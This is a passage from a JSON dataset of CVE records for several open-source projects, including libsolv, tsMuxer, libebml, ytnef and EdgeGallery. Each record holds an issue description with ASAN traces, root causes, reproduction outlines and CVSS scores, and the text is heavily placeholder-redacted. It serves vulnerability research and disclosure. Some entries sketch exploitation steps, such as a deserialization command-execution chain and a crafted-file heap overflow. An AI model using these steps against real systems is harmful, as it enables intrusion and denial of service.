  67834. "exploitabilityScore": 2.2
  67835. },
  67836. {
  67837. "CVE_ID": "CVE-2021-33928",
  67838. "Issue_Url_old": "https://github.com/openSUSE/libsolv/issues/417",
  67839. "Issue_Url_new": "https://github.com/opensuse/libsolv/issues/417",
  67840. "Repo_new": "opensuse/libsolv",
  67841. "Issue_Created_At": "2020-12-13T06:03:06Z",
  67842. "description": "libsolv APITAG function a heap overflow vulnerability. \u201cpool_disabled_solvable\u201d function a heap overflow vulnerability \u201cpool_installable\u201d function a heap overflow vulnerability APITAG function a heap overflow vulnerability Description: There are three heap buffer overflow bugs in function: static inline int pool_disabled_solvable(const Pool pool, Solvable s) static inline int pool_installable(const Pool pool, Solvable s) static inline int APITAG Pool pool, Solvable s) at src/repo.h: line NUMBERTAG line NUMBERTAG and line NUMBERTAG The statement of these three lines are same, as follows: if (!MAPTST(pool >considered, id)) The program defines \u201cMAPTST(m, n)\u201d that \u201c((m) >map (n NUMBERTAG n NUMBERTAG MAPTST(pool >considered, id) is same as pool >considered >map[id NUMBERTAG id NUMBERTAG This statement involves pool >considered >map[id NUMBERTAG The variable pool >considered is a Map structure pointer. The Map structure as following: typedef struct APITAG { unsigned char map; int size; } Map; If the index value \u201cid NUMBERTAG is bigger than pool >considered >size, there is a heap overflow bug. Please reproduce this issue through the following APITAG PATHTAG APITAG pool_disabled_solvable line NUMBERTAG URLTAG If you configure CC with flag fsanitize=address, you will get the following outputs: testcase_read: cannot parse command 'D' disable: unknown package 'E NUMBERTAG src APITAG disable: unknown package 'F NUMBERTAG src APITAG test NUMBERTAG test NUMBERTAG str2job: unknown selection flag 'b' testcase_read: cannot parse command 'repo' test NUMBERTAG Results differ: job noop name (A . i NUMBERTAG setarch] APITAG APITAG heap buffer overflow on address NUMBERTAG f1 at pc NUMBERTAG f0ef3b NUMBERTAG cc bp NUMBERTAG fffcdcb NUMBERTAG sp NUMBERTAG fffcdcb NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f1 thread T NUMBERTAG f0ef3b NUMBERTAG cb in pool_disabled_solvable PATHTAG NUMBERTAG f0ef3b NUMBERTAG cb in APITAG PATHTAG NUMBERTAG f0ef3b NUMBERTAG cb in selection_name PATHTAG NUMBERTAG f0ef3b NUMBERTAG in selection_name_arch PATHTAG NUMBERTAG f0ef3b NUMBERTAG in selection_name_arch_rel PATHTAG NUMBERTAG f0ef3b NUMBERTAG in selection_make PATHTAG NUMBERTAG f0efce NUMBERTAG e in addselectionjob PATHTAG NUMBERTAG f0efce NUMBERTAG cc6 in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG f0ef NUMBERTAG f5bf6 in __libc_start_main PATHTAG NUMBERTAG e6f9 in _start ( PATHTAG NUMBERTAG f1 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG abe NUMBERTAG in calloc PATHTAG NUMBERTAG f0ef3a NUMBERTAG f NUMBERTAG in solv_calloc PATHTAG NUMBERTAG f0ef NUMBERTAG ccdba in map_init PATHTAG NUMBERTAG f0efce NUMBERTAG a in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG f0ef NUMBERTAG f5bf6 in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in pool_disabled_solvable Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa fd fd fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fa fa fa fd fa fa fa fd fd fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING",
  67843. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  67844. "severity": "HIGH",
  67845. "baseScore": 7.5,
  67846. "impactScore": 3.6,
  67847. "exploitabilityScore": 3.9
  67848. },
  67849. {
  67850. "CVE_ID": "CVE-2021-33938",
  67851. "Issue_Url_old": "https://github.com/openSUSE/libsolv/issues/420",
  67852. "Issue_Url_new": "https://github.com/opensuse/libsolv/issues/420",
  67853. "Repo_new": "opensuse/libsolv",
  67854. "Issue_Created_At": "2020-12-13T06:13:26Z",
  67855. "description": "libsolv \u201cprune_to_recommended\u201d function two heap overflow vulnerabilities. Description: There are two heap buffer overflow vulnerabilities in static void APITAG solv, Queue plist) at src/policy.c: line NUMBERTAG line NUMBERTAG FOR_PROVIDES(p, pp, rec) MAPSET(&solv >recommendsmap, p); // line NUMBERTAG The first case, it involves variable \u201csolv >recommendsmap\u201d. The libsolv defines MAPSET as following: define MAPSET(m, n) ((m) >map (n NUMBERTAG n NUMBERTAG Therefore, MAPSET(&solv >recommendsmap, p) involves the variable \u201csolv >recommendsmap >map[p NUMBERTAG The type of the variable \u201csolv >recommendmap\u201d is the structure Map. The Map structure defines as following: typedef struct APITAG { unsigned char map; int size; } Map; If the value of the index variable \u201cp NUMBERTAG is bigger than \u201csolv >recommendmap >size\u201d, there will be a heap buffer overflow bug. if (!MAPTST(&solv >recommendsmap, p)) // line NUMBERTAG The libsolv defines MAPTST as following: define MAPTST(m, n) ((m) >map[(n NUMBERTAG n NUMBERTAG Therefore, the variable \u201cMAPTST(&solv >recommendsmap, p)\u201d is same with \u201csolv >recommendmap >map[p NUMBERTAG APITAG }'DHA\udb0e\udf2deh\u00c9\u0626\udb41\udf3b testcase_read: cannot parse command APITAG NUMBERTAG u`N NUMBERTAG APITAG NUMBERTAG B\u94fb( \u0587,I NUMBERTAG A~)\u00b5\u714a\u00bc\u00adQ testcase_read: could not open PATHTAG APITAG alternative' APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG d1 at pc NUMBERTAG f2ba NUMBERTAG fb3c bp NUMBERTAG ffc4dab NUMBERTAG sp NUMBERTAG ffc4dab NUMBERTAG READ of size NUMBERTAG at NUMBERTAG d1 thread T0 APITAG NUMBERTAG f2ba NUMBERTAG fb3b in policy_update_recommendsmap PATHTAG NUMBERTAG f2ba NUMBERTAG fb3b in prune_to_recommended PATHTAG NUMBERTAG f2ba NUMBERTAG fb3b in policy_filter_unwanted PATHTAG NUMBERTAG f2ba NUMBERTAG d in resolve_dependencies PATHTAG NUMBERTAG f2ba NUMBERTAG faba4 in solver_run_sat PATHTAG NUMBERTAG f2ba NUMBERTAG a in solver_solve PATHTAG NUMBERTAG f1eea in main PATHTAG NUMBERTAG f2b9f NUMBERTAG cbf6 in __libc_start_main PATHTAG NUMBERTAG e6f9 in _start ( PATHTAG NUMBERTAG d1 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG abe NUMBERTAG in calloc PATHTAG NUMBERTAG f2ba NUMBERTAG f NUMBERTAG in solv_calloc PATHTAG NUMBERTAG f2ba NUMBERTAG e3dba in map_init PATHTAG NUMBERTAG f2ba NUMBERTAG f1abe in solver_create PATHTAG NUMBERTAG f2ba9da NUMBERTAG d4 in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG f2b9f NUMBERTAG cbf6 in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in policy_update_recommendsmap Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa fd fa fa fa fd fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING Please reproduce this issue through the following APITAG PATHTAG APITAG policy_update_recommendsmap NUMBERTAG URLTAG If you configure CC with flag fsanitize=address, you will get the following outputs: testcase_read: system: unknown repo 'system' str2job: bad line APITAG result: unknown flag 'trans >erase' testcase_read: could not open PATHTAG testcase_read: cannot parse command 'sysine>' testcase_read: could not open PATHTAG testcase_read: cannot parse command APITAG testcase_read: cannot parse command 'sysine>' testcase_read: could not open PATHTAG str2job: bad line APITAG result: unknown flag 'trans >erase' testcase_read: could not open PATHTAG testcase_read: cannot parse command '\u049cX' str2job: bad line 'provrovides E' result: unknown flag 'transction' APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG f2e7ddb NUMBERTAG c2 bp NUMBERTAG ffcf NUMBERTAG f0 sp NUMBERTAG ffcf NUMBERTAG e8 READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG f2e7ddb NUMBERTAG c1 in prune_to_recommended PATHTAG NUMBERTAG f2e7ddb NUMBERTAG c1 in policy_filter_unwanted PATHTAG NUMBERTAG f2e7de3b5af in solver_choicerulecheck PATHTAG NUMBERTAG f2e7de3b5af in solver_addchoicerules PATHTAG NUMBERTAG f2e7dc NUMBERTAG in solver_solve PATHTAG NUMBERTAG f1eea in main PATHTAG NUMBERTAG f2e7cc3dbf6 in __libc_start_main PATHTAG NUMBERTAG e6f9 in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG abe NUMBERTAG in calloc PATHTAG NUMBERTAG f2e7dd9af NUMBERTAG in solv_calloc PATHTAG NUMBERTAG f2e7dc NUMBERTAG dba in map_init PATHTAG NUMBERTAG f2e7dc NUMBERTAG abe in solver_create PATHTAG NUMBERTAG f2e NUMBERTAG da2d4 in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG f2e7cc3dbf6 in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in prune_to_recommended Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fb NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fa fa fa fd fd fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING",
  67856. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  67857. "severity": "HIGH",
  67858. "baseScore": 7.5,
  67859. "impactScore": 3.6,
  67860. "exploitabilityScore": 3.9
  67861. },
  67862. {
  67863. "CVE_ID": "CVE-2021-33961",
  67864. "Issue_Url_old": "https://github.com/softvar/enhanced-github/issues/96",
  67865. "Issue_Url_new": "https://github.com/softvar/enhanced-github/issues/96",
  67866. "Repo_new": "softvar/enhanced-github",
  67867. "Issue_Created_At": "2021-05-21T10:31:25Z",
  67868. "description": "Stored XSS Vulnerable. Use a browser that has installed extensions to access a APITAG repository containing malicious xss code in the file name, and you will be attacked by xss vulnerability\u3002 as follows\uff1a URLTAG Vulnerability repair suggestions\uff1a Filter keywords and characters: javascript APITAG APITAG",
  67869. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  67870. "severity": "MEDIUM",
  67871. "baseScore": 6.1,
  67872. "impactScore": 2.7,
  67873. "exploitabilityScore": 2.8
  67874. },
  67875. {
  67876. "CVE_ID": "CVE-2021-33988",
  67877. "Issue_Url_old": "https://github.com/nck0099/osTicket/issues/2",
  67878. "Issue_Url_new": "https://github.com/nck0099/osticket/issues/2",
  67879. "Repo_new": "nck0099/osticket",
  67880. "Issue_Created_At": "2021-05-23T18:49:14Z",
  67881. "description": "Microweber APITAG Reflected XSS. Microweber Reflected XSS Vuln Description: APITAG XSS attacks, also known as non persistent attacks, occur when a malicious script is reflected of a web application to the victim's browser. The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts._ Impact: High APITAG impact of an exploited XSS vulnerability on a web application varies a lot. It ranges from user's Session Hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data._ POC: Identified un Authenticated XSS on microweber CMS Version NUMBERTAG APITAG request is modified to insert XSS payload FILETAG NUMBERTAG SS payload inserted in has been executed as shown in the snapshot. FILETAG Request: CODETAG Response: CODETAG",
  67882. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  67883. "severity": "MEDIUM",
  67884. "baseScore": 6.1,
  67885. "impactScore": 2.7,
  67886. "exploitabilityScore": 2.8
  67887. },
  67888. {
  67889. "CVE_ID": "CVE-2021-3403",
  67890. "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/85",
  67891. "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/85",
  67892. "Repo_new": "yeraze/ytnef",
  67893. "Issue_Created_At": "2021-01-30T11:51:22Z",
  67894. "description": "Double free via APITAG While it seems there are many checks which ought to prevent various memory corruption situations it seems there's a double free that can be triggered still. With ASAN and some crafted input: ERRORTAG Manually instrumenting the code shows that indeed the same memory is freed twice: ERRORTAG I have attached a minimal reproducer of this crash: FILETAG",
  67895. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67896. "severity": "HIGH",
  67897. "baseScore": 7.8,
  67898. "impactScore": 5.9,
  67899. "exploitabilityScore": 1.8
  67900. },
  67901. {
  67902. "CVE_ID": "CVE-2021-3404",
  67903. "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/86",
  67904. "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/86",
  67905. "Repo_new": "yeraze/ytnef",
  67906. "Issue_Created_At": "2021-01-30T11:51:28Z",
  67907. "description": "Heap buffer overflow via APITAG A heap buffer overflow can be triggered with crafted input, despite ytnef recognizing that the provided input file is not valid: ERRORTAG However when built with ASAN we see that APITAG attempts to read invalid memory before said error message can be printed: ERRORTAG I have attached a minimal reproducer of this crash: FILETAG",
  67908. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67909. "severity": "HIGH",
  67910. "baseScore": 7.8,
  67911. "impactScore": 5.9,
  67912. "exploitabilityScore": 1.8
  67913. },
  67914. {
  67915. "CVE_ID": "CVE-2021-3405",
  67916. "Issue_Url_old": "https://github.com/Matroska-Org/libebml/issues/74",
  67917. "Issue_Url_new": "https://github.com/matroska-org/libebml/issues/74",
  67918. "Repo_new": "matroska-org/libebml",
  67919. "Issue_Created_At": "2021-02-07T14:10:51Z",
  67920. "description": "APITAG heap overflow bug on NUMBERTAG bit builds NUMBERTAG Summary An extremely exploitable heap overflow bug exists in the implementation of APITAG and APITAG in libebml. This bug is reachable from the current stable release of vlc NUMBERTAG Discussion The issue exists in the calculation of the required buffer size to store the string. The following calculation is performed NUMBERTAG auto Buffer = new (std::nothrow) APITAG NUMBERTAG APITAG APITAG The value returned from APITAG is guaranteed to be an unisigned NUMBERTAG bug number, and due to the way in which intetgers are stored and parsed in Ebml will only use the lowest NUMBERTAG bits. This guarantees that the integer cannot overflow on NUMBERTAG but builds. However, on NUMBERTAG bit builds, the value is implicitly cast to a size_t in the call to new, meaning that the truncated length can be significantly shorter than the amount of data to be copied. For example, if the length of the string element is claimed to be NUMBERTAG ffffffff, the resultant allocation will be NUMBERTAG The cast to a NUMBERTAG bit size_t drops the top NUMBERTAG bit, meaning an array of size zero is allocated. In the event that the string element is placed maliciously at the end of the file to be parsed, an extremely exploitable controlled heap overflow can occur NUMBERTAG Resolution The fix for this bug is relatively straightforward, a check must be added to ensure that the value of APITAG NUMBERTAG is less than SIZE_MAX to ensure that it will not be truncated in the call to new NUMBERTAG Proof of Concept The following proof of concept file shows the behaviour in the latest (at time of writing) version of vlc on Ubuntu NUMBERTAG sudo apt install vlc:i NUMBERTAG gdb $ wget FILETAG $ gdb q vlc $$ r libebml poc.mkv",
  67921. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67922. "severity": "MEDIUM",
  67923. "baseScore": 6.5,
  67924. "impactScore": 3.6,
  67925. "exploitabilityScore": 2.8
  67926. },
  67927. {
  67928. "CVE_ID": "CVE-2021-34066",
  67929. "Issue_Url_old": "https://github.com/EdgeGallery/developer-be/issues/1",
  67930. "Issue_Url_new": "https://github.com/edgegallery/developer-be/issues/1",
  67931. "Repo_new": "edgegallery/developer-be",
  67932. "Issue_Created_At": "2021-05-25T08:46:01Z",
  67933. "description": "There is a Deserialization vulnerability that can execute system command.. vulnerability type: Deserialization of Untrusted Data impact: system command execution app version: Edgegallery/developer NUMBERTAG Create a META INF/services file, and create a APITAG file, and write what needs to be loaded The name of the class is pocy, and the files of this class are placed in the same directory as META INF: FILETAG NUMBERTAG File content: FILETAG NUMBERTAG Start an httpserver server: APITAG NUMBERTAG Prepare yaml POC: APITAG NUMBERTAG Install and access the APITAG module, click APITAG and debug\" > APITAG FILETAG NUMBERTAG Upload the constructed yaml file FILETAG Click to upload the created yaml file. FILETAG NUMBERTAG iew the request information of the http server: FILETAG NUMBERTAG Construct the pocy of the creation command: (contain the \"touch /tmp/hackercor0ps\" command) ERRORTAG NUMBERTAG Log in to the host and verify whether the command is executed successfully. FILETAG We can see that the \u201ctouch /tmp/hackercor0ps\u201d command was successfully executed.",
  67934. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  67935. "severity": "CRITICAL",
  67936. "baseScore": 9.8,
  67937. "impactScore": 5.9,
  67938. "exploitabilityScore": 3.9
  67939. },
  67940. {
  67941. "CVE_ID": "CVE-2021-34067",
  67942. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/424",
  67943. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/424",
  67944. "Repo_new": "justdan96/tsmuxer",
  67945. "Issue_Created_At": "2021-05-22T16:27:48Z",
  67946. "description": "heap buffer overflow in APITAG Hi, please see asan output and poc file below. System info\uff1a Ubuntu NUMBERTAG APITAG version git f6ab2a2 APITAG version git f6ab2a2. PATHTAG This HEVC stream doesn't contain fps value. Muxing fps is absent too. Set muxing FPS to default NUMBERTAG alue. HEVC manual defined fps doesn't equal to stream fps. Change HEVC fps from NUMBERTAG to NUMBERTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG eaf2 at pc NUMBERTAG c bp NUMBERTAG ffc6a2a NUMBERTAG sp NUMBERTAG ffc6a2a NUMBERTAG READ of size NUMBERTAG at NUMBERTAG eaf2 thread T NUMBERTAG b in APITAG PATHTAG NUMBERTAG b in APITAG int, int) PATHTAG NUMBERTAG af in APITAG , unsigned char , unsigned char , int) PATHTAG NUMBERTAG f NUMBERTAG in APITAG , unsigned char , unsigned char , int) PATHTAG NUMBERTAG bfa4 in APITAG char , int) PATHTAG NUMBERTAG d0b NUMBERTAG in APITAG char , int, APITAG int, int) PATHTAG NUMBERTAG c NUMBERTAG in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, bool) PATHTAG NUMBERTAG df NUMBERTAG e in APITAG const , APITAG , bool) PATHTAG NUMBERTAG efd NUMBERTAG in main PATHTAG NUMBERTAG fb NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ebded in _start ( PATHTAG NUMBERTAG eaf5 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG d in operator APITAG long) ( PATHTAG NUMBERTAG in APITAG char const , unsigned char const ) PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbda0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING",
  67947. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67948. "severity": "MEDIUM",
  67949. "baseScore": 5.5,
  67950. "impactScore": 3.6,
  67951. "exploitabilityScore": 1.8
  67952. },
  67953. {
  67954. "CVE_ID": "CVE-2021-34068",
  67955. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/427",
  67956. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/427",
  67957. "Repo_new": "justdan96/tsmuxer",
  67958. "Issue_Created_At": "2021-05-24T18:09:22Z",
  67959. "description": "heap buffer overflow in APITAG Hi, please see asan output and poc file below. Found by Cem Onat Karagun of Diesec System info\uff1a APITAG To run APITAG after unzip: APITAG FILETAG Asan output: ERRORTAG",
  67960. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67961. "severity": "MEDIUM",
  67962. "baseScore": 5.5,
  67963. "impactScore": 3.6,
  67964. "exploitabilityScore": 1.8
  67965. },
  67966. {
  67967. "CVE_ID": "CVE-2021-34069",
  67968. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/428",
  67969. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/428",
  67970. "Repo_new": "justdan96/tsmuxer",
  67971. "Issue_Created_At": "2021-05-24T18:10:51Z",
  67972. "description": "Denial of Service in APITAG Hi, please see asan output and poc file below. Found by Cem Onat Karagun of Diesec . System info\uff1a APITAG To run APITAG after unzip: APITAG FILETAG ASAN output: ERRORTAG",
  67973. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67974. "severity": "MEDIUM",
  67975. "baseScore": 5.5,
  67976. "impactScore": 3.6,
  67977. "exploitabilityScore": 1.8
  67978. },
  67979. {
  67980. "CVE_ID": "CVE-2021-34070",
  67981. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/426",
  67982. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/426",
  67983. "Repo_new": "justdan96/tsmuxer",
  67984. "Issue_Created_At": "2021-05-24T13:22:08Z",
  67985. "description": "Out of bounds Read in APITAG of APITAG Greetings, APITAG has an Out of bounds Read issue whenever runs with the APITAG sample. Found by Cem Onat Karagun of Diesec System info\uff1a APITAG To run APITAG after unzip: APITAG FILETAG Chronological Function Call Trace NUMBERTAG APITAG const , APITAG , bool) PATHTAG NUMBERTAG APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, bool) PATHTAG NUMBERTAG APITAG char , int, APITAG int, int) PATHTAG NUMBERTAG APITAG char , int) PATHTAG NUMBERTAG APITAG PATHTAG NUMBERTAG APITAG PATHTAG Root Cause of The Issue: Constant integer arrays are defined in APITAG APITAG However, the array index nr is set to NUMBERTAG therefore nr NUMBERTAG is larger than boundary of array ff_vc1_fps_nr. CODETAG A similar \"demo\" issue is also shared in following page: [ URLTAG URLTAG I'm sharing the link above, because ASAN declares this issue as \"global buffer overflow\" but as shared in References and root cause sections this is actually a OOB read issue. Recommendation: Editing size check of \"array index\" within \"if condition\" in line NUMBERTAG might fix this \"particular\" issue. An additional check of index variables (dr and nr) for NUMBERTAG is recommended . APITAG Fix: APITAG References: FILETAG Address Sanitizer Output: ERRORTAG",
  67986. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67987. "severity": "MEDIUM",
  67988. "baseScore": 5.5,
  67989. "impactScore": 3.6,
  67990. "exploitabilityScore": 1.8
  67991. },
  67992. {
  67993. "CVE_ID": "CVE-2021-34071",
  67994. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/423",
  67995. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/423",
  67996. "Repo_new": "justdan96/tsmuxer",
  67997. "Issue_Created_At": "2021-05-22T16:27:04Z",
  67998. "description": "heap buffer overflow in APITAG Hi, please see asan output and poc file below. System info\uff1a Ubuntu NUMBERTAG APITAG version git f6ab2a2 Asan output: APITAG version git f6ab2a2. PATHTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f5 at pc NUMBERTAG f NUMBERTAG bp NUMBERTAG ffebdd7b NUMBERTAG sp NUMBERTAG ffebdd7b NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f5 thread T NUMBERTAG f NUMBERTAG in APITAG int) PATHTAG NUMBERTAG e NUMBERTAG in APITAG char , int) PATHTAG NUMBERTAG ceacc in APITAG char , int, APITAG int, int) PATHTAG NUMBERTAG c NUMBERTAG in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, bool) PATHTAG NUMBERTAG df NUMBERTAG e in APITAG const , APITAG , bool) PATHTAG NUMBERTAG efd NUMBERTAG in main PATHTAG NUMBERTAG fb1de NUMBERTAG a NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ebded in _start ( PATHTAG NUMBERTAG f5 is 